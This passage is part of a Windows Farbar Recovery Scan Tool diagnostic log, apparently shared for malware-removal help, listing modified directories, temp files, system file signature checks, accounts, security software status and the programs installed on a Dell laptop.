2015-05-30 11:24 - 2012-08-20 14:58 - 00000860 _____ C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core.job
2015-05-27 11:27 - 2013-02-20 19:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2015-05-27 11:19 - 2013-02-20 19:10 - 00003894 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-05-27 11:19 - 2013-02-20 19:10 - 00003642 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-05-27 11:19 - 2013-02-20 19:10 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-05-27 11:19 - 2012-08-20 14:58 - 00003884 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006UA
2015-05-27 11:19 - 2012-08-20 14:58 - 00003488 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-1038277221-3604561771-2240411101-1006Core
2015-05-27 11:17 - 2011-08-16 09:07 - 00000000 ____D C:\ProgramData\Skype
2015-05-25 09:57 - 2012-04-25 08:56 - 00000000 ___RD C:\Program Files (x86)\Skype
2015-05-22 03:05 - 2013-09-22 01:06 - 00000000 ____D C:\Program Files\Microsoft Office 15
2015-05-20 03:01 - 2015-04-05 03:03 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-05-20 03:01 - 2015-04-05 03:03 - 00000000 ___SD C:\Windows\system32\GWX
2015-05-14 14:27 - 2014-02-27 02:39 - 00000000 ____D C:\Program Files (x86)\Hearthstone
2015-05-13 19:26 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\rescache
2015-05-13 05:44 - 2012-07-22 15:13 - 00000000 ____D C:\Users\dell 2\AppData\Roaming\Mozilla
2015-05-13 04:58 - 2013-03-13 08:50 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-05-13 04:58 - 2013-03-13 08:50 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-05-13 04:53 - 2010-11-21 03:17 - 00000000 ____D C:\Program Files\Windows Journal
2015-05-13 04:53 - 2009-07-13 23:20 - 00000000 ____D C:\Windows\system32\AdvancedInstallers
2015-05-13 04:50 - 2015-04-19 20:23 - 00000000 ____D C:\ProgramData\Origin
2015-05-13 03:35 - 2012-01-24 18:15 - 00000000 ____D C:\Program Files (x86)\Microsoft Application Virtualization Client
2015-05-13 03:25 - 2013-08-13 17:25 - 00000000 ____D C:\Windows\system32\MRT
2015-05-13 03:04 - 2013-03-13 08:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
 
==================== Files in the root of some directories =======
 
2015-06-07 03:52 - 2015-06-07 04:23 - 6103040 _____ () C:\Program Files (x86)\GUT9627.tmp
2012-08-30 13:20 - 2013-08-14 22:55 - 0000600 _____ () C:\Users\dell 2\AppData\Local\PUTTY.RND
2012-09-05 07:51 - 2013-03-18 14:38 - 0007610 _____ () C:\Users\dell 2\AppData\Local\Resmon.ResmonCfg
 
Some files in TEMP:
====================
C:\Users\dell 2\AppData\Local\Temp\Quarantine.exe
C:\Users\dell 2\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-01-14 05:18
 
==================== End of log ============================
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version:07-06-2015
Ran by dell 2 at 2015-06-08 12:58:02
Running from C:\Users\dell 2\Downloads
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1038277221-3604561771-2240411101-500 - Administrator - Disabled)
dell 2 (S-1-5-21-1038277221-3604561771-2240411101-1006 - Administrator - Enabled) => C:\Users\dell 2
Guest (S-1-5-21-1038277221-3604561771-2240411101-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1038277221-3604561771-2240411101-1002 - Limited - Enabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Norton Security Suite (Disabled - Up to date) {53C7D717-52E2-B95E-FA61-6F32ECC805DB}
AV: Norton Security Suite (Disabled - Up to date) {D87FA2C0-F526-77B1-D6EC-0EDF3936CEDB}
AS: Norton Security Suite (Disabled - Up to date) {631E4324-D31C-783F-EC5C-35AD42B18466}
AS: Trend Micro Client/Server Security Agent Anti-spyware (Disabled - Up to date) {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Norton Security Suite (Enabled - Up to date) {E8A636F3-74D8-B6D0-C0D1-5440974F4F66}
FW: Norton Security Suite (Disabled) {E04423E5-BF49-76E9-FDB3-A7EAC7E589A0}
FW: Norton Security Suite (Disabled) {6BFC5632-188D-B806-D13E-C607121B42A0}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
AccelerometerP11 (HKLM-x32\...\{87434D51-51DB-4109-B68F-A829ECDCF380}) (Version: 2.00.10.22 - STMicroelectronics)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 17 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 17.0.0.188 - Adobe Systems Incorporated)
Adobe Flash Player 17 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 17.0.0.169 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe InDesign CS6 (HKLM-x32\...\{CFB770D7-8D43-1014-922B-CC2715FADE3F}) (Version: 8.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Adobe Reader X (10.1.6) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.6 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.8.638 - Adobe Systems, Inc.)
Age of Empires II: HD Edition (HKLM-x32\...\Steam App 221380) (Version:  - Hidden Path Entertainment, Ensemble Studios)
Apple Application Support (HKLM-x32\...\{EB879750-CCBD-4013-BFD5-0294D4DA5BD0}) (Version: 2.1.7 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
AuthenTec Fingerprint Software (Version: 8.4.4.20 - AuthenTec, Inc.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BioAPI Framework (Version: 1.0.2 - Dell Inc.) Hidden
Broadcom NetXtreme-I Netlink Driver and Management Installer (HKLM\...\{64973F6A-8754-43D1-BDD0-FC6F0546347B}) (Version: 14.4.6.2 - Broadcom Corporation)
Cisco WebEx Meetings (HKLM-x32\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Custom (Version: 01.00.00.000 - Wave Systems Corp.) Hidden
CyberLink PowerDVD 9.5 (HKLM-x32\...\InstallShield_{A8516AC9-AAF1-47F9-9766-03E2D4CDBCF8}) (Version: 9.5.1.3225 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dell Backup and Recovery Manager (HKLM\...\{50B4B603-A4C6-4739-AE96-6C76A0F8A388}) (Version: 1.3.1 - Dell Inc.)
Dell Data Protection | Access (HKLM-x32\...\{A7D91856-258D-4C87-8041-B170851CE432}) (Version: 2.0.00001.001 - Dell Inc.)
Dell Data Protection | Access (Version: 01.01.01.001 - Wave Systems Corp) Hidden
Dell Data Protection | Access | Drivers (HKLM-x32\...\{4E4E65EE-C456-45AC-B5AD-C62C3A325BD0}) (Version: 1.00.011 - Dell Inc.)
Dell Data Protection | Access | Middleware (HKLM-x32\...\{841CBDD5-4BB5-403E-AEE3-2FADC3890BE8}) (Version: 1.00.005 - Dell Inc.)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell System Detect (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\9204f5692a8faf3b) (Version: 5.7.0.6 - Dell)
Dell System Manager (HKLM\...\{FDF509ED-9624-4FDE-9BAA-9566C186AB96}) (Version: 1.6.00000 - Dell Inc.)
Dell Touchpad (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.1208.101.116 - ALPS ELECTRIC CO., LTD.)
Dell Webcam Central (HKLM-x32\...\Dell Webcam Central) (Version: 1.40.28 - Creative Technology Ltd)
DellAccess (Version: 01.01.00.053 - Wave Systems Corp.) Hidden
Digital Line Detect (HKLM-x32\...\{E646DCF0-5A68-11D5-B229-002078017FBF}) (Version: 1.21 - BVRP Software, Inc)
DirectX 9 Runtime (x32 Version: 1.00.0000 - Sonic Solutions) Hidden
EMBASSY Security Center (Version: 04.03.00.067 - Wave Systems Corp.) Hidden
EPSON Printer Software (HKLM\...\EPSON Printer and Utilities) (Version:  - )
FileZilla Client 3.6.0.2 (HKLM-x32\...\FileZilla Client) (Version: 3.6.0.2 - FileZilla Project)
FileZilla Server (HKLM-x32\...\FileZilla Server) (Version: beta 0.9.39 - FileZilla Project)
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
Gemalto (Version: 01.64.01.0010 - Wave Systems Corp) Hidden
Glyph (HKLM-x32\...\Glyph) (Version:  - Trion Worlds, Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 43.0.2357.81 - Google Inc.)
Google Drive (HKLM-x32\...\{35574F09-89F9-4B16-B69B-64F3E25901B8}) (Version: 1.21.9226.6034 - Google, Inc.)
Google Talk Plugin (HKLM-x32\...\{3F15E203-BC3E-3597-84CD-EDF99546C917}) (Version: 3.2.4.8431 - Google)
Google Talk Plugin (HKLM-x32\...\{CA3DD97D-1FD7-37A7-BD5C-FC4430C8B8E6}) (Version: 5.41.2.0 - Google)
Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.27.5 - Google Inc.) Hidden
GoToMeeting 5.4.0.1082 (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\GoToMeeting) (Version: 5.4.0.1082 - CitrixOnline)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.241 - SurfRight B.V.)
Intel® Identity Protection Technology 1.0.71.0 (HKLM-x32\...\{2C43790E-8470-1027-82D3-DF319F3C410F}) (Version: 1.0.71.0 - Intel Corporation)
Intel® Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.4101 - Intel Corporation)
Intel® PROSet/Wireless WiFi Software (HKLM\...\{4C1CCA11-0D08-4D5E-8444-2D9FB48BCABF}) (Version: 14.00.20110 - Intel Corporation)
Intel® SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)
join.me (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\JoinMe) (Version: 1.7.0.138 - LogMeIn, Inc.)
Juniper Networks Network Connect 7.4.0 (HKLM-x32\...\Juniper Network Connect 7.4.0) (Version: 7.4.0.27757 - Juniper Networks)
Juniper Networks, Inc. Setup Client (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\Juniper_Setup_Client) (Version: 7.4.6.40675 - Juniper Networks, Inc.)
Juniper Networks, Inc. Setup Client 64-bit Activex Control (HKLM\...\Juniper_Setup_Client Activex Control) (Version: 2.1.1.1 - Juniper Networks, Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Exploit version 1.06.1.1019 (HKLM\...\Malwarebytes Anti-Exploit_is1) (Version: 1.06.1.1019 - Malwarebytes)
Malwarebytes Anti-Malware version 2.1.6.1022 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.6.1022 - Malwarebytes Corporation)
McAfee Security Scan Plus (HKLM\...\McAfee Security Scan) (Version: 3.8.130.10 - McAfee, Inc.)
Medieval II: Total War (HKLM-x32\...\Steam App 4700) (Version:  - The Creative Assembly)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Multi-Targeting Pack (HKLM-x32\...\{CFEF48A8-BFB8-3EAC-8BA5-DE4F8AA267CE}) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4.5.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.51209 - Microsoft Corporation)
Microsoft Help Viewer 1.1 (HKLM\...\Microsoft Help Viewer 1.1) (Version: 1.1.40219 - Microsoft Corporation)
Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.2.173.0 - Microsoft Corporation)
Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 15.0.4719.1002 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Report Viewer 2012 Runtime (HKLM-x32\...\{9CCE40CE-A9E6-4916-8729-B008558EEF3F}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40416.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\SkyDriveSetup.exe) (Version: 17.0.2003.1112 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server 2008 R2 Management Objects (HKLM-x32\...\{83F2B8F4-5CF3-4BE9-9772-9543EAE4AC5F}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft SQL Server 2008 Setup Support Files  (HKLM\...\{B40EE88B-400A-4266-A17B-E3DE64E94431}) (Version: 10.1.2731.0 - Microsoft Corporation)
Microsoft SQL Server 2012 (64-bit) (HKLM\...\Microsoft SQL Server SQLServer2012) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2012 Native Client  (HKLM\...\{49D665A2-4C2A-476E-9AB8-FCC425F526FC}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Setup (English) (HKLM\...\{AB4AE7E5-E63E-458E-A9D9-B271EA2ED69B}) (Version: 11.1.3000.0 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL Compiler Service  (HKLM\...\{BEB0F91E-F2EA-48A1-B938-7857ABF2A93D}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server 2012 Transact-SQL ScriptDom  (HKLM\...\{0E8670B8-3965-4930-ADA6-570348B67153}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft SQL Server System CLR Types (HKLM-x32\...\{C3F6F200-6D7B-4879-B9EE-700C0CE1FCDA}) (Version: 10.51.2500.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server 2012 (x64) (HKLM\...\{F1949145-EB64-4DE7-9D81-E6D27937146C}) (Version: 11.0.2100.60 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Runtime - 10.0.40219 (HKLM-x32\...\{5D9ED403-94DE-3BA0-B1D6-71F4BDA412E6}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Shell (Isolated) - ENU (HKLM-x32\...\{D64B6984-242F-32BC-B008-752806E5FC44}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft VSS Writer for SQL Server 2012 (HKLM\...\{3E0DD83F-BE4C-4478-86A0-AD0D79D1353E}) (Version: 11.0.2100.60 - Microsoft Corporation)
Modem Diagnostic Tool (HKLM\...\{0335701D-8E28-4A7F-B0EF-312974755BB2}) (Version: 1.0.28.0 - Dell)
Mozilla Firefox 29.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 29.0.1 (x86 en-US)) (Version: 29.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 29.0.1 - Mozilla)
Mozilla Thunderbird 17.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 17.0 (x86 en-US)) (Version: 17.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Netwaiting (HKLM-x32\...\{3F92ABBB-6BBF-11D5-B229-002078017FBF}) (Version: 2.5.59 - BVRP Software, Inc)
Norton Security Suite (HKLM-x32\...\N360) (Version: 21.7.0.11 - Symantec Corporation)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 5.9.3 - )
NTRU TCG Software Stack (Version: 2.1.34 - Security Innovation) Hidden
O2Micro Flash Memory Card Windows Driver (HKLM-x32\...\InstallShield_{938A412F-78C1-4158-8590-038A1D670A57}) (Version: 3.0.07.47 - O2Micro International LTD.)
O2Micro Flash Memory Card Windows Driver (x32 Version: 3.0.07.47 - O2Micro International LTD.) Hidden
O2Micro OZ776 SCR Driver (HKLM-x32\...\InstallShield_{732D0C79-C6E3-4EDE-8D11-67D58697E0DE}) (Version: 2.1.4.210GS - O2Micro)
O2Micro OZ776 SCR Driver (Version: 2.1.4.210GS - O2Micro) Hidden
Office 15 Click-to-Run Extensibility Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Licensing Component (Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
Office 15 Click-to-Run Localization Component (x32 Version: 15.0.4719.1002 - Microsoft Corporation) Hidden
OpenOffice.org 3.3 (HKLM-x32\...\{3E171899-0175-47CC-84C4-562ACDD4C021}) (Version: 3.3.9567 - OpenOffice.org)
Opera Mobile (HKLM-x32\...\{FA55C144-16EC-4C19-ABFF-2E172C26950D}_is1) (Version:  - Opera Software ASA)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PC-CCID (Version: 2.0.0 - Gemalto) Hidden
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
Pegasus Mail (HKLM-x32\...\Pegasus Mail) (Version:  - David Harris)
Pegasus Mail HTML Renderer 2.4.7.2 (HKLM-x32\...\{A9F5E1E1-1281-4862-90B4-6CF8E6AF83CE}_is1) (Version:  - Micha's Midnight Manufacture)
PhotoShowExpress (x32 Version: 2.0.063 - Sonic Solutions) Hidden
PowerISO (HKLM-x32\...\PowerISO) (Version: 6.2 - Power Software Ltd)
Preboot Manager (Version: 03.03.00.049 - Wave Systems Corp.) Hidden
PremiumSoft Navicat Lite 9.0 (HKLM-x32\...\PremiumSoft Navicat Lite_is1) (Version:  - PremiumSoft CyberTech Ltd.)
Private Information Manager (Version: 07.01.00.007 - Wave Systems Corp.) Hidden
QuickTime (HKLM-x32\...\{0E64B098-8018-4256-BA23-C316A43AD9B0}) (Version: 7.72.80.56 - Apple Inc.)
RaidCall (HKLM-x32\...\RaidCall) (Version: 7.3.6-1.0.12972.94 - raidcall.com)
RBVirtualFolder64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Roxio Creator Starter (HKLM-x32\...\{6F0BBEFE-BE1C-419B-BA1F-D36C9E7915BC}) (Version: 12.1.77.0 - Roxio)
Roxio File Backup (Version: 1.3.2 - Roxio) Hidden
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
Sid Meier's Civilization V (HKLM-x32\...\Steam App 8930) (Version:  - 2K Games, Inc.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 7.4.0.9058 - Microsoft Corporation)
Skype™ 7.4 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.4.102 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sophos Virus Removal Tool (HKLM-x32\...\{B829E117-D072-41EA-9606-9826A38D34C1}) (Version: 2.1 - Sophos Limited)
SPBA 5.9 (Version: 5.9.4.6686 - UPEK Inc.) Hidden
SQL Server 2012 Common Files (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Services (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Database Engine Shared (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server 2012 Management Studio (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
SQL Server Browser for SQL Server 2012 (HKLM-x32\...\{4B9E6EB0-0EED-4E74-9479-F982C3254F71}) (Version: 11.0.2100.60 - Microsoft Corporation)
Sql Server Customer Experience Improvement Program (Version: 11.0.2100.60 - Microsoft Corporation) Hidden
Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
TaxACT 2010 (HKLM-x32\...\TaxACT 2010) (Version:  - 2nd Story Software, Inc.)
TaxACT 2010 Michigan (HKLM-x32\...\TaxACT 2010 Michigan) (Version:  - 2nd Story Software, Inc.)
TaxACT 2011 - 1040 Edition (HKLM-x32\...\TaxACT 2011 - 1040 Edition) (Version:  - 2nd Story Software, Inc.)
TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.14 - TeamSpeak Systems GmbH)
TeamViewer 8 (HKLM-x32\...\TeamViewer 8) (Version: 8.0.30992 - TeamViewer)
Trend Micro Client/Server Security Agent (HKLM-x32\...\{BED0B8A2-2986-49F8-90D6-FA008D37A3D2}) (Version: 3.0.3152 - Trend Micro)
Trusted Drive Manager (Version: 4.0.5.8 - Wave Systems Corp.) Hidden
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.2.1 - Tweaking.com)
Upek Touchchip Fingerprint Reader (Version: 1.2.004 - Dell Inc.) Hidden
Ventrilo Client (HKLM-x32\...\{789289CA-F73A-4A16-A331-54D498CE069F}) (Version: 3.0.8 - Flagship Industries, Inc.)
Visual Studio 2010 Prerequisites - English (HKLM\...\{662014D2-0450-37ED-ABAE-157C88127BEB}) (Version: 10.0.40219 - Microsoft Corporation)
VmciSockets (Version: 9.1.54.1 - VMware, Inc.) Hidden
VMware Player (HKLM-x32\...\VMware_Player) (Version: 4.0.4.30409 - VMware, Inc)
VMware Player (x32 Version: 4.0.4.30409 - VMware, Inc.) Hidden
Wave Infrastructure Installer (Version: 07.66.40.0008 - Wave Systems Corp) Hidden
Wave Support Software Installer (Version: 05.13.00.014 - Wave Systems Corp) Hidden
WIDCOMM Bluetooth Software (HKLM\...\{436E0B79-2CFB-4E5F-9380-E17C1B25D0C5}) (Version: 6.3.0.7900 - Broadcom Corporation)
Widevine Media Optimizer IE 6.0.0 (HKU\S-1-5-21-1038277221-3604561771-2240411101-1006\...\optimizer_ie) (Version: 6.0.0.12757 - Widevine Technologies)
Windows Driver Package - Dell Inc. PBADRV System  (09/11/2009 1.0.1.6) (HKLM\...\9512AA21B791B05A54E27065C45BBC417AB282DF) (Version: 09/11/2009 1.0.1.6 - Dell Inc.)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)
WinRAR 5.21 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.21.0 - win.rar GmbH)
WinZip 19.5 (HKLM\...\{CD95F661-A5C4-44F5-A6AA-ECDD91C240E9}) (Version: 19.5.11475 - WinZip Computing, S.L. )
